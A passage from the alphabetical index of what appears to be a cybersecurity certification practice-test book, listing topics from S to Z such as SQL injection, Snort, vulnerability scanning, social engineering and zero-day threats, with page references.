deprecating, 393 
passcodes, 395 
SMTP (Simple Mail Transfer Protocol), 343 
validating, 24 
sniffing tools, 320 
SNMP (Simple Network Management Protocol), 
331, 343, 355 
outdated versions, 336 
snmpwalk command, 173, 368 
Snort, 383 
Snort IDS, 384 
SOA (Start of Authority), 325 
SOC (Service Organization Control) audits, 
12, 343 
incident response and, 362 
social engineering, 35, 204, 226, 380 
baiting, 30 
firewalls and, 381 
pretexting, 30 
pretexting and, 315, 318 
quid pro quo, 30 
whaling, 30 
social media 
penetration testing, 7 
profile identification, 25 
profiling, 35, 320 
Social Security number breaches, 35, 320 
software 
changes, 192 
development methodology, 220, 225, 230 
naming, 18 
SolarWinds Network Mapper, 153, 313, 362 
rogue devices, 155 
Sourcefire, 383, 384 
SOX (Sarbanes-Oxley) Act, 331, 379, 384 
SP (service providers), 378, 388 
spam, 14 
headers, 168, 366 
spoofs and, 363 
spear phishing, 30, 318 
special characters, 237 
SPF records, 325 
Splunk, 392 
spoofing, 356 
preventing, 49 
sprints, agile method, 389 
SQL 
blind injection vulnerabilities, 333 
injection attack, 67, 82, 95, 126, 316, 
320, 326, 335 
blind injection, 71 
database access, 75 
IPS blocking, 336 
OWASP, 200 
remediation, 137 
vulnerability, 226-227 
TCP ports, 321 
SQL injection vulnerability, 335 
SQLite, Chrome forensic information, 359 
Squert, 143, 184 
SSH, login failure, 373 
ssh, access behind firewall, 47 
ssh scans, 319 
SSHA password storage, 395 
sshd, PermitRootLogin, 309 
sshd daemon, 396 
SSID detection, 354, 364 
SSL (Secure Sockets Layer), 395 
VPN connections, 335 
ssl-request-log file, 244 
StackProtect, 360 
stateful packet inspection firewalls, 326 
static analysis, 176, 312, 386 
static libraries, 151 
steganography, stegdetect, 314 
stegdetect, 314 
stolen devices, 202 
storage, volatility, 365 
Storm botnet, 373 
stress testing, 383, 384 
strings command, 313 
Strings tool, 314 
Stuxnet attack, 160 
succession planning, 384, 393 
sudo command, 203, 380 
Super Timeline, 366 
symmetric cryptography, 383 
SYN cookies, 314 
SYN floods, 20 
SYN-ACK, 20 


Sysinternals suite, 163, 186, 215, 354 
directory permissions, 140 
permissions, 217 
Process Explorer, 195 

syslog 
port scans, 18 
severity, 395 
severity level alerts, 242 

Sysmon, 385 

system binary kits, 367 

system configuration settings, 115 

system hardening, 20 
MBSA, 31 

System log, 358 

system restore, 142, 370 
validation, 171 

system speed, 124 


T 


TACACS, 385 
TACACS+, 385, 394 
tag-outs, 21 
Tamper Data, 387 
tarpits, 49 
task scheduling, Windows, 315 
TCP ports 
1433, 39, 42 
1434, 42 
1812, 45 
1813, 45 
IRC, 321 
listening, 31 
Microsoft SQL servers, 322 
Oracle, 321 
SQL, 321 
VNC, 321 
TCP SYN scan, 310, 319 
tcpdump, 388 
teams, 160 
black team, 5, 323 
blue team, 5, 10, 38, 309, 323, 330 
cybersecurity exercises, 45 


defending team, 61 

red team, 5, 11, 38, 309, 320, 323, 330 

white team, 309, 323, 330 
technical architecture, 386 
technical control review, 15 
Technical Report, 66, 331, 346, 350 
telnet, 310 

blocking, 331 

disabling, 331 

securing, 20 

service validation and, 316 
terminated users, 206, 212 
test systems, 352 
testing 

automated, 219 

environment, 135, 216, 353, 386 

final, 227 

hardware, 212 

load testing, 383, 384 

mutation, 395 

penetration, 2, 4 

regression testing, 394, 397 

stress testing, 383, 384 

UAT (user acceptance testing), 389 
text-to-speech, 368 
TheHarvester, 313, 320 
threat management review, 1-61 
answers, 308-330 
threats 

adversarial, 329 

categories, 58, 153 

slow downs, 177 

honeynet, 5 
timelines, Super Timeline, 366 
timestamps, Chrome, 371 
TippingPoint, 378, 384 
TLS (Transport Layer Security), 347, 395 

Chrome, 210 

most used, 242 

public key cryptography, 383 
TLS encryption, HTTPS, 315 
TOGAF Architecture Development Model, 
218, 386 

token-based authentication, 323 
tool set review, 193-250 
answers, 377-399 
tool-assisted reviews, 377 
top command, 327 
Top Secret, US classification levels, 381 
topology maps, 15 
traceroute, 7, 52, 209, 228-229, 326, 385, 390 
trade secrets, 169, 367 
trademarks, 169, 367 
traffic 
detection, 174 
ifconfig, 363 
iptables rule, 47 
live graph, 186, 187 
netflows, 34 
outbound packets, 368 
pcap file, 33 
Wireshark, 196, 200, 235 
traffic patterns 
flow logs, 360 
network flows and, 315 
sudden resumption, 360 
trend analysis, 40, 321 
trend-based detection, 3 
Tripwire, 30, 313 
Trojans, 324 
Truman, 373 
Trusted Access Program, 34 
Trusted Foundry program (DoD), 34, 52, 319 
Trusted Suppliers, 34 
tuna phishing, 30 
two-factor authentication, 171 
two-person control, 213, 384-385 


U 


UAT (user acceptance testing), 389, 394 
Ubuntu 

apt command, 358 

rogue services, 44 

update history, 151 

upstart, 323 
UDP scans, 322 



Unix 
nc -k -l 6667, 181
user account information, 322 
Unknown Device Report, 66, 331, 350 
US classification levels, 204 
Confidential, 381 
Secret, 381 
Top Secret, 381 
USB devices 
first use, 184 
forensics, 166 
multi-interface drive adapter, 376 
setupapi file, 373 
user accounts 
added, 42 
creation log, 143 
date created, 151 
Linux, age, 176 
new, 163 
removal, 382 
terminated users, 206, 212 


V 


vacation, mandatory, 381, 385 
validation 

post-rebuild, 143 

process, 145 

sanitization, 160 

system restore, 171 
validation phase, 355 

logging verification, 355 

patching, 355 

permissions, 355 

scanning, 355 
/var/log/auth.log, 26-27 
vendor application accounts, 217 
virtual machines 

capture, 148 

forensics, 154 

malware testing, 183 

suspending, 359 
virtualization environment, 114 


virtualization platforms, 346, 353 
external host, 117 
management, 106 
monitoring, 106 
scanner exposure, 137 

virtualized systems, 333 
patches, 71 

VirusTotal, 319, 374 
results, 172 

visitor logs, reviews, 379 

VLANs, 377 

VM escape attacks, 330 

VMware, 332 

VNC, TCP ports, 321 

volatility 
listing, 180 
media, 371 

VPN links, IPsec, 335 

VPNs (virtual private networks), 377, 395, 397
insecure cipher support removal, 86 
protocols triggering vulnerability scan alert, 79
site-to-site, 239 

vulnerabilities 
attacker’s eye view, 342 
blind SQL injection attack, 71 
buffer overflow, 105 
BYOD, 111 
cleartext logins, 94 
correcting, 64 
databases, 79, 94, 121-122 
emergency change, 103 
firmware, 65 
FTP server access, 118 
highest-severity, 111, 115, 347 
high-priority, 346 
Info level, 341 
information confidentiality, 120 
information disclosure, 110 
insider threats, 101 
internal hosts, 80-81 
Internet Explorer 8, 105 
IPS alerts, scans and, 382 
laptops, 69
mail server, 83 
NetBIOS name conflict, 90 
network interconnection, 120 
operating system settings and, 100 
Oracle Database TNS Listener Poison Attack, 347
phpinfo information disclosure, 128 
printers, 103 
priorities, 65, 98 
publicly available information, 15 
Rational ClearCase Portscan Denial of Service, 347
remediation, 76, 84-85, 338 
prioritizing, 78, 81, 84, 89, 100-101, 104, 107, 108, 111, 116, 125
team member, 83 
templates, 118 
remote code execution, 125 
reporting, 78, 112 
search appliance, 136 
sensor network, 71 
signature verification failed, 126-127 
signed certificate weak hashing algorithm, 130-131
significant, 136 
source information, 216 
SQL injection attack, 226-227 
unpatchable, 103 
unsupported installation detection, 121 
web servers, 86 
workarounds, 102 
zero-day, 124 
vulnerability management, 245 
bandwidth and, 123 
escalation, 135 
remediation criteria, 132 
vulnerability management review, 64-138 
answers, 330-353 
vulnerability report, impact statement, 338 
vulnerability scans, 219, 319, 333 
aborting, 137 
agent-based scanning, 73 
Apache server, 89 


CIFS files, 113 
Class C network, 88 
configuration changes, 129 
correction services, 68 
credentialed scanning, 73, 132 
DMZ, 102 
documentation, 116 
external, 77, 127 
false positives, 72, 89
frequency, 73, 91 

minimum, 136 
High Severity Report, 66, 331, 350 
incomplete, 107 
initial, 119 
initial steps, 97 
initial toolset, 245 
internal, 77 
jumpbox, 113 
laptops, 64 
large networks, 130 
low severities only, 99 
old scanners, 82 
operating system, 68 
patches, 68 
prior to meeting, 122 
QualysGuard, 109 
reporting, 66, 126, 128 
scanner requirements, 99 
SCAP components, 65 
scheduling, 84, 137 
server-based scanning, 73 
SharePoint service, 70-71 
signature collision, 93 
SQL injection attack, 82, 92 
system configuration settings, 115 
system speed and, 72 
TCP/IP timestamps, 100 
Technical Report, 66, 331, 346, 350 
uncredentialed scanning, 73 
Unknown Device Report, 66, 331, 350 
update frequency, 115 
updating, 345 


virtualization environment, 79 
W


Wapiti, 375 
waterfall model, 390, 397 
Wayback Machine, 310 
web applications 
security, 227, 249 
firewalls, 232 
priorities, 204 
SQL backend identification, 134-135 
web proxy servers, 214 
page loading speed, 385 
web server, 86 
logs, 24 
ports, 331 
printers, 342 
securing, 20 
web-based attacks, 356 
websites 
availability in equipment failure, 199 
historic versions, 9 
pop-up messages, 207 
wget, 310
whaling, 30, 318, 376 
which command, 324 
white team, 309, 323, 330 
whitelisting, 321 
whoami command, 321 
WHOIS, 318, 320 
NIC choice, 31 
technical impact category, 59 
Windows 
command history recovery, 181 
disk filling up, 186 
memory protection methodology, 156 
server, 97 
services 
list, 53 
sc command, 329 
system restore point, 176 
task scheduling, 315 


Windows registry 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, 150
wireless networks, 359 
Windows Task Manager, high CPU utilization, 152
WinRAR, 92 
wired networks, 41 
wireless networks, 41 
listing, 154 
security tools, 241 
Windows registry, 359 
Wireshark, 16, 38, 200, 235, 313, 314, 320, 
329, 343, 356 
packet captures, 44 
traffic, 196 


X


XCCDF (Extensible Configuration Checklist Description Format), 331, 350
xinetd, 369 


Z


ZAP, 375, 387, 390
Zenmap scan, 25, 317, 320 
Zenmap topology view, 37 
zero wipe, 312 
zero-day attacks, cloud-based services, 249
zero-day integer overflow attack, 121
zero-day malware, 376 
detection methods, 2 
patching and, 361 
zero-day threats, 159 
zero-day vulnerabilities, 124
.zip files, 371 
zone transfer, 319 